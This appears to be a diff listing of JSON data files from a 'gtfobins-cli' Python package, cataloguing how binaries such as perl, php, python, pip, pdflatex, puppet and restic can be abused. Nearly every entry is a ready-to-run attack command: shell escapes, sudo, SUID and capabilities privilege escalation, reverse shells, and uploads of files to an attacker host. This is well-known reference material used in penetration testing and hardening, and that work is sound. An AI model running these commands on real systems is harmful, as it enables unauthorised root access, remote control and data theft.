gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/paste.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "paste [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "paste [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo paste [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/pdb.json

@@ -0,0 +1,15 @@
+{
+  "description": "This allows to execute Python code, other functions may apply.",
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\npdb $TF\ncont\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\nsudo pdb $TF\ncont\n"
+      }
+    ]
+  }
+}

gtfo/data/pdflatex.json

@@ -0,0 +1,29 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file will be part of the output.",
+        "code": "pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\npdftotext article.pdf -\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The read file will be part of the output.",
+        "code": "sudo pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\npdftotext article.pdf -\n"
+      },
+      {
+        "code": "sudo pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ]
+  }
+}

gtfo/data/pdftex.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "pdftex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo pdftex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./pdftex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ]
+  }
+}

gtfo/data/perl.json

@@ -0,0 +1,35 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "perl -e 'exec \"/bin/sh\";'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "perl -ne print [file]"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in([port],inet_aton(\"[host]\")))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./perl -e 'exec \"/bin/sh\";'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo perl -e 'exec \"/bin/sh\";'"
+      }
+    ],
+    "capabilities": [
+      {
+        "code": "./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'"
+      }
+    ]
+  }
+}

gtfo/data/pg.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "pg /etc/profile\n!/bin/sh\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "pg [file]"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo pg /etc/profile\n!/bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./pg [file]"
+      }
+    ]
+  }
+}

gtfo/data/php.json

@@ -0,0 +1,70 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "php -r 'system(\"/bin/sh\");'\n"
+      },
+      {
+        "code": "php -r 'passthru(\"/bin/sh\");'\n"
+      },
+      {
+        "code": "php -r 'print(shell_exec(\"/bin/sh\"));'\n"
+      },
+      {
+        "code": "php -r '$r=array(); exec(\"/bin/sh\", $r); print(join(\"\\\\n\",$r));'\n"
+      },
+      {
+        "code": "php -r '$h=@popen(\"/bin/sh\",\"r\"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'\n"
+      }
+    ],
+    "command": [
+      {
+        "code": "php -r '$p = array(array(\"pipe\",\"r\"),array(\"pipe\",\"w\"),array(\"pipe\", \"w\"));$h = @proc_open(\"[command]\", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "php -r '$sock=fsockopen(\"[host]\",[port]);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.",
+        "code": "php -S [host]:[port]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "php -r '$c=file_get_contents(\"[url]\");file_put_contents(\"[file]\", $c);'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./php -r \"pcntl_exec('/bin/sh', ['-p']);\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo php -r \"system('/bin/sh');\"\n"
+      }
+    ],
+    "capabilities": [
+      {
+        "code": "./php -r \"posix_setuid(0); system('/bin/sh');\"\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "php -r 'readfile(\"[file]\");'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "write data to a file, filename should be absolute.",
+        "code": "php -r 'file_put_contents(\"[file]\", \"[data]\");'\n"
+      }
+    ]
+  }
+}

gtfo/data/pic.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "pic -U\n.PS\nsh X sh X\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo pic -U\n.PS\nsh X sh X\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./pic -U\n.PS\nsh X sh X\n"
+      }
+    ]
+  }
+}

gtfo/data/pico.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "pico\n^R^X\nreset; sh 1>&0 2>&0\n"
+      },
+      {
+        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "code": "pico -s /bin/sh\n/bin/sh\n^T\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "pico [file]\n[data]\n^O\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "pico [file]"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "code": "./pico -s /bin/sh\n/bin/sh\n^T\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo pico\n^R^X\nreset; sh 1>&0 2>&0\n"
+      }
+    ]
+  }
+}

gtfo/data/pip.json

@@ -0,0 +1,53 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\npip install $TF\n"
+      },
+      {
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request. It needs an absolute local file path.",
+        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "It needs an absolute local file path.",
+        "code": "TF=$(mktemp -d)\necho \"open('[file]','w+').write('DATA')\" > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file content is corrupted as wrapped within an exception error.",
+        "code": "TF=$(mktemp -d)\necho 'raise Exception(open(\"file_to_read\").read())' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\npip install $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo pip install $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/pkexec.json

@@ -0,0 +1,9 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "code": "sudo pkexec /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/pkg.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "It runs commands using a specially crafted FreeBSD package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF\n```",
+        "code": "sudo pkg install -y --no-repo-update ./x-1.0.txz\n"
+      }
+    ]
+  }
+}

gtfo/data/pr.json

@@ -0,0 +1,20 @@
+{
+  "description": "Some bytes are altered so it might not be suitable for binary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "pr -T [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "pr -T [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "pr -T [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/pry.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "pry\nsystem(\"/bin/sh\")\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo pry\nsystem(\"/bin/sh\")\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./pry\nsystem(\"/bin/sh\")\n"
+      }
+    ]
+  }
+}

gtfo/data/psql.json

@@ -0,0 +1,15 @@
+{
+  "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+  "functions": {
+    "shell": [
+      {
+        "code": "psql\n\\?\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "psql\n\\?\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/puppet.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "puppet apply -e \"exec { '/bin/sh -c \\\"exec sh -i <$(tty) >$(tty) 2>$(tty)\\\"': }\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The file path must be absolute.",
+        "code": "puppet apply -e \"file { '[file]': content => 'DATA' }\"\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file content is corrupted by the `diff` output format. The actual '/usr/bin/diff' command is executed.",
+        "code": "puppet filebucket -l diff /dev/null [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo puppet apply -e \"exec { '/bin/sh -c \\\"exec sh -i <$(tty) >$(tty) 2>$(tty)\\\"': }\"\n"
+      }
+    ]
+  }
+}

gtfo/data/python.json

@@ -0,0 +1,62 @@
+{
+  "description": "The payloads are compatible with both Python version 2 and 3.",
+  "functions": {
+    "shell": [
+      {
+        "code": "python -c 'import os; os.system(\"/bin/sh\")'"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "python -c 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n"
+      },
+      {
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "python -c 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "python -c 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "python -c 'open(\"[file]\",\"w+\").write(\"DATA\")'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "python -c 'print(open(\"[file]\").read())'"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "python -c 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo python -c 'import os; os.system(\"/bin/sh\")'"
+      }
+    ],
+    "capabilities": [
+      {
+        "code": "./python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/rake.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "rake -p '`/bin/sh 1>&0`'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo rake -p '`/bin/sh 1>&0`'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./rake -p '`/bin/sh 1>&0`'"
+      }
+    ]
+  }
+}

gtfo/data/readelf.json

@@ -0,0 +1,20 @@
+{
+  "description": "Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "readelf -a @[file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./readelf -a @[file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo readelf -a @[file]\n"
+      }
+    ]
+  }
+}

gtfo/data/red.json

@@ -0,0 +1,20 @@
+{
+  "description": "Read and write files limited to the current directory.",
+  "functions": {
+    "file-write": [
+      {
+        "code": "red [file]\na\nDATA\n.\nw\nq\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "red [file]\n,p\nq\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo red [file]\na\nDATA\n.\nw\nq\n"
+      }
+    ]
+  }
+}

gtfo/data/redcarpet.json

@@ -0,0 +1,15 @@
+{
+  "description": "The file is actually parsed as a Markdown file.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "redcarpet \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo redcarpet \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/restic.json

@@ -0,0 +1,20 @@
+{
+  "description": "The attacker must setup a server to receive the backups, in the following example https://github.com/restic/rest-server/ is used but there are other options. To start a new instance and create a new repository:\n\n./rest-server --listen \":[port]\"\nrestic init -r \"rest:http://localhost:[port]/[file]\"\n\nTo extract the data from the restic repository in the current directory on the attacker side:\n\nrestic restore -r \"/tmp/restic/[file]\" latest --target .\n\nUpload data to the attacker server with the following commands.\n",
+  "functions": {
+    "file-upload": [
+      {
+        "code": "restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./restic backup -r \"rest:http://[host]:[port]/[backup]\" \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/rev.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "rev [file] | rev\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./rev [file] | rev\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo rev [file] | rev\n"
+      }
+    ]
+  }
+}

gtfo/data/rlogin.json

@@ -0,0 +1,11 @@
+{
+  "description": "Usually 'rlogin' is a symlink to 'ssh' the following works only when the real 'rlogin' is used (e.g., from the 'rsh-client' APT package).",
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Send contents of a file to a TCP port. Run 'nc -l -p [port] > [file]' on the attacker system to capture the contents. 'rlogin' hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.",
+        "code": "rlogin -l \"$(cat [file])\" -p [port] [host]\n"
+      }
+    ]
+  }
+}

gtfo/data/rlwrap.json

@@ -0,0 +1,25 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "rlwrap /bin/sh"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This adds timestamps to the output file. This relies on the external 'echo' command.",
+        "code": "rlwrap -l [file] echo DATA\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./rlwrap -H /dev/null /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo rlwrap /bin/sh"
+      }
+    ]
+  }
+}